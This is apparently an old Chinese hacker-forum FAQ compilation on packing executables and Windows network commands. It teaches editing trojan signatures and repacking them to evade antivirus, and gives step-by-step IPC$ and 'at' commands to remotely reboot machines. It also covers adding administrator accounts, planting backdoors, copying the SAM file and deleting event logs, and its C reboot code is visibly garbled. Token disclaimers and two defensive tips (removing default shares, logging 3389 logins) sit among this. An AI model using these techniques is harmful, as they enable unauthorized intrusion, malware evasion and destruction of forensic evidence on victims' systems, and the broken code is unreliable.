其实脱壳和加壳并不是很困难!

  先说说壳的作用吧!其实加壳的作用一共有2个目的!

  1)可以压缩EXE格式的文件!使体积变小!

  2)保护软件吧重要信息保护起来,防止别人更改!

  脱壳和加壳分2种方法!

  第一种方法:手动脱壳(加壳),呵呵,这个是比较麻烦的!恩,需要了解源代码什么的,还要知道不同的脱壳(加壳)软件的算法,才能成功脱壳(加壳),新学习脱壳(加壳)技术的朋友不推荐使用!

  第二种方法是:自动脱壳(加壳)!通过使用软件,可以轻而易举的实现上面那个相对来说复杂一些的操作!对了,补充一下啊~!其实脱壳和加壳现在还有一个引申的作用!就是让杀毒软件不能识别出病毒!!!呵呵……这个一会儿再说!

  主要使用的软件有:FileInfo、Language2000、TYP、PEiDentifier等(侦测软件!可以查看该文件用什么加壳软件加的壳!!!为脱壳起到至关重要的辅助作用!!!)

  脱壳软件:AspackDie、UnAspack、UnPEPack等……(UPX也可以自己脱掉自己加的壳!)

  加壳软件:UPX、ASPack……这两个特别流行!

  恩,有的***如果你用最新的杀毒软件查看,并不能查出是***程序,但是如果你在开启病毒防火墙的情况下运行这个程序,则防火墙报警,说有***或病毒什么的,询问如何处理,一般这种情况,就证明这个文件是通过脱壳、加壳后处理的***了!小心啊,不要运行!!!其实不知道是谁说的脱壳、加壳处理***?其实他再说的过程中似乎还省略了一些东西!再这个过程中,可以把***做的更加个性化!更隐蔽,让杀毒软件更加无能为力!方法是:再脱壳后,用汇编软件(UltraEdit)打开那个***!修改里面的标志性文字或者符号!再用eXeScope给***换一个图标,之后再次加壳,这样,由于***中的特征字符被更改了,导致以前能识别的***现在杀毒软件更加不能识别出来了~比如:著名的冰河,在其服务端的源代码中有一段歌词,把歌词替换掉,呵呵……如果有的杀毒软件查找冰河的源代码时候仅仅检测的是这段歌词,以歌词作为冰河的特征的话,那这个杀毒软件可就……另外,前面说了,加壳的作用还有一个就是保护版权信息!可以把***的版权信息(如制作人更改成你的名字,那么……呵呵)比较个性化吧~~~恩,当然,我写这个回帖的目的不是让大家都去练习脱壳、加壳,做***,黑中国人!我的目的是让大家了解那些所谓能不被杀毒软件查杀的***是怎么制作出来的,让大家更好的防范!

  后面的是我后来补充的帖子内容:因为部分朋友看完我前面的回复后,仍然不明白~所以补充说明~

  恩,检查壳的软件???我用Language2000+PEiDentifier来看!前者可以看这个软件用什么编写的,比如C++什么的,但是对于到底是什么加壳软件加壳,探测的效果不好……后者可以看这个软件用什么加的壳~本帖给加上了后者的软件!(大家如果需要,自己去找找看,实在找不到,可以跟我联系!)恩,下面我在重复一遍我上一个帖子的东东啊!!!大家如果不仔细看上一个帖子,怎么能理解加壳的作用呢???

  加壳的目的是让杀毒软件不能够识别加壳后的***!!!这一点是不允许任何人有疑问的!!!恩~怎么说呢?如果大家都用UPX加壳(这里是假设),前面介绍过了,如果都用软件的话,由于这个是自动加壳的软件,所以加壳的效果没有任何好坏之分!!!一个不会用电脑的人或许加壳的水平和一个加壳高手(晕~有这种高手么?)的加壳水平一样!当然,前提是都用同一个软件加壳的话!不过真正的加壳高手是不会用加壳软件的!他们选择手动加壳!如果是手动加壳,那由于加壳的人的水平不一,导致壳的质量也不同!!!自动加壳不存在水平的问题!!!首先推荐使用UPX,简单到我都想自杀了~~~其次是ASPack,可以设定加壳后的文件保护!还可以设定使用限制(比如天数限制,次数限制……)

  下面这个问题也是老生常谈了,前面的帖子说过的!***脱壳后,经过编辑***!可以吧***编辑的更加个性!比如***的制作人等资料……包括***的图标!!!都做好以后,再次加壳,可以达到3个目的!!!1)保护***,不被杀毒软件查杀!!!这点是相当实用的!2)保护***不被别人更改!如果用UltraEdit等软件打开加壳后的***,***中的中文是乱码!!!用这个方法可以判断程序是否加壳!加壳的程序打开后中文显示的是乱码,未加壳的则是中文!!!3)也是最最最最最最最最重要的一点!前面说了一遍了,加壳后可以使EXE文件的尺寸大大减小!!!相信你不会吧一个1M多的***传给别人或者捆绑到网页,捆绑到Flash,捆绑到程序里吧,那样做是十分不明智的!!!!!!!!!!!!!

  关于加壳的问题就说这么多~似乎废话多了点!再次请求大家仔细看看我前面的帖子和这个帖子,如果看完后还有不明白的再提问!很多问题都重复了……

  Steven-1985,你的问题我前面也说过:***加壳的确可以躲避杀毒软件,从而不被查杀,不过,有一点需要注意!运行***后,***释放出来的程序、Dll文件是脱壳后的文件!(相当于解压缩后的文件),这些文件已经不受壳的保护了!!!用最新版的杀毒软件可以查杀掉的!

  如果还有不明白的问题的话,还可以参考看一下:黑白专区的steven-1985的加壳与脱壳的帖子!

×××××××××××××××××××××××××××××××××××××××××××××

  22)如何删除windows2K的默认贡献?

  首先打开记事本,输入如下内容:

  net share c$ /delete
  net share d$ /delete
  net share e$ /delete
  net share f$ /delete
  net share g$ /delete
  net share ipc$ /delete
  net share admin$ /delete

  这里的c$、d$、e$……是代表默认共享的盘符~又几个就设置几个就可以了~

  之后点击保存成批处理文件(后缀为:bat的文件!)!加入到启动组中就可以了~

×××××××××××××××××××××××××××××××××××××××××××××

  23)139端口的又一用法

  呵呵,写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点:1)不要利用本帖所提到的方法去搞恶意破坏!2)呵呵,可能许多人已经知道了139端口这个用法了~本文只想起到一个抛砖引玉的作用!

  废话不多说了~开始:

  如果你使用NT主机的话,那你可要注意了!
  重启NT主机的方法如下:

  1:Net use XXX.XXX.XXX.XXXipc$ "password" /user:"username"
   建立一个IPC连接

  2:net use H: XXX.XXX.XXX.XXXC$
   将对方的C盘映射为自己的h盘

  3:copy c on h:reboot.bat
   Iisreset /reboot
   CTRL+Z
   在对方的C盘上生成一个能重启机器的文件

  4:net time XXX.XXX.XXX.XXX
   得到对方机器时间

  5:at XXX.XXX.XXX.XXX 重启的时间 c:reboot.bat
   设定对方重启的时间!

  6:at XXX.XXX.XXX.XXX
   查看任务上面是否添加了这个任务

  7:等对方重启好了~

  上面的第三步是only for Win2K的,如果是Nt,就需要用意个指定的重启程序,我们可以自己编写一个reboot.exe来代替reboot.bat,代码如下:
  #i nclude "stdio.h"
  #i nclude "windows.h"
  int main()
  {
  //定义重启的时候发送给所有用户的消息
  LPSTR msg="Reboot Tool By LionHooknhttp://www.xici.net";;
  //尝试用最简单的API函数重启
  if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
  if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
  //因为上面的重启不成功,所以需要调整本进程的特权
  HANDLE hToken;
  TOKEN_PRIVILEGES tkp;
  if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;
  //获取重启的特权 SE_SHUTDOWN_NAME
  LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
  tkp.PrivilegeCount=1;
  tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
  AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
  //判断是NT内核还是9X内核,选择用不同的方式
  if(!GetVersion()& 0x80000000))
  InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
  else if (!ExitWindowXXX(EWX_REBOOT,0))
  if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
  return FALSE;
  return TRUE;

  对了,再次说明啊,别用本文提到的方法搞破坏,小心警察叔叔打PP~呵呵

×××××××××××××××××××××××××××××××××××××××××××××

  24)利用批处理文件来建立一个记录3389登陆者信息的记录器

  由于Terminal Service默认是没有日志记录的,只能依靠他的系统日志,但是系统日志只能记录一些大动作(开启或停止服务),那么,如何用批处理文件来编写一个将是3389端口的程序呢?很简单:

  建立一个批处理文件:内容如下:

  @echo off
  date/t >> c:3389log.txt
  :TS3389
  time/t >> c:3389log.txt
  netstat -an | find "3389" |find "ESTABLISHED" >>c:3389log.txt
  goto :TS3389

  之后保存!

  如果有人用你的3389登陆你的机器,呵呵,在c盘下就有3389log.txt这个文件!记录了当天日志,还有连接时间……资料~开始反击~呵呵

×××××××××××××××××××××××××××××××××××××××××××××

  25)网络命令小节(最近因为新学HACK的朋友人数上涨了~所以把我的这个陈年老调又一次拿出来,因为是我刚来S8S8的时候就整理的了,所以可能会有些错误的地方,如果发现请帮忙指出!)——呵呵,第一个问题只对菜鸟有作用!如果你是高手或者是自认为高手的话,请从第二题看起!

  A、NET命令:

  IPC连接:格式 net use 对方IPipc$ "密码" user:"用户名"      『建立IPC连接~』
         net use 对方IPipc$ /delete   『断开连接~』

  以下操作需要在连接到对方主机后才可进行!!!

  net user coldcrysky xyz /add    『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』

  net localgroup Administrator coldcrysky /add    『把名为coldcrysky的用户加入ADMIN组—以为着权限的提高啊!!!^_^』

  net use z:对方IPC$       『把对方的C盘映射为本机的Z盘—可依照需要更改映射盘符!』
  net start telnet          『开启TELNET』
  net user guest /active:yes     『激活GUEST』
  net user guest coldcrysky     『把GUEST密码改为COLDCRYSKY』

  B、AT命令:

  查看远程机时间:net time 对方IP

  加入一项新任务:

  at 对方IP 时间 文件名     『用来把自己上传的后门程序在制定时间运行,方便以后进入肉鸡!』

  C、TELNET命令:

  telnet 对方IP 端口       『作用不用我说了吧???』

  D、FTP命令:

  登陆:ftp 对方网址(IP地址)
  上传文件:get 文件在本机完整路径 对方文件存放完整路径
  下载文件:put 对方文件完整路径 本机存放文件路径

  E、COPY命令:

  在建立连接后(尤其是IPC$连接后,很有用的命令哦~)
  ⑴copy index.htm 127.0.0.1c$index.htm
  『将本机index.htm文件复制到127.0.0.1的C盘下,如果要放到对方的NT目录下,则把C改为admin$』
  ⑵copy 127.0.0.1adminrepairsam_ c:
  『将远程机数据库文件拷贝到本机C盘根目录下』

  F、SET命令:

  主要用于分析目标计算机的基本信息用!具体使用方法请查找相关文件!

  G、NBTSTAT命令:

  nbtstat -A 对方IP (这个A大写)

  『在其中显示<037>前面的英文或数字就是计算机名称!当然,也可以利用PING -A 对方ip的方法来查看对方主机名!效果相同!!!』

  H、SHUTDOWN命令:

  『用来关闭对方NT服务的命令』格式如下:
  shutdown IP地址 t:20
  『20秒后自动关闭对方NT服务!由于对对方机器影响较大,慎用!!!』

  I、DIR命令:

  还用我说么?大家是不是早就该掌握了???(不知道的还是查阅相关资料吧~~~)

  J、ECHO命令:

  echo coldcrysky >index.htm   『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
  echo coldcrysky >>index.htm   『把coldcrysky加入到index.htm中』

  K、ATTRIB命令:

  更改文件属性用,格式:
  Attrib -r index.htm   『去掉只读属性』(+- 分别代表增加和减少)

  L、DEL命令:

  『删除日志的时候用!』
  del c:winntsystem32logfiles*.*
  del c:winntsystem32config*.evt
  del c:winntsystem32dtclog*.*
  del c:winntsystem32*.log
  del c:winntsystem32*.txt
  del c:winnt*.txt
  del c:winnt*.log

  M、PING命令:

  -t :ping制定IP,知道网络断开或按CTRL+C结束!
  -a :解释PING IP的主机名
  -n count :发送count指定的ECHO数据包,默认为4个!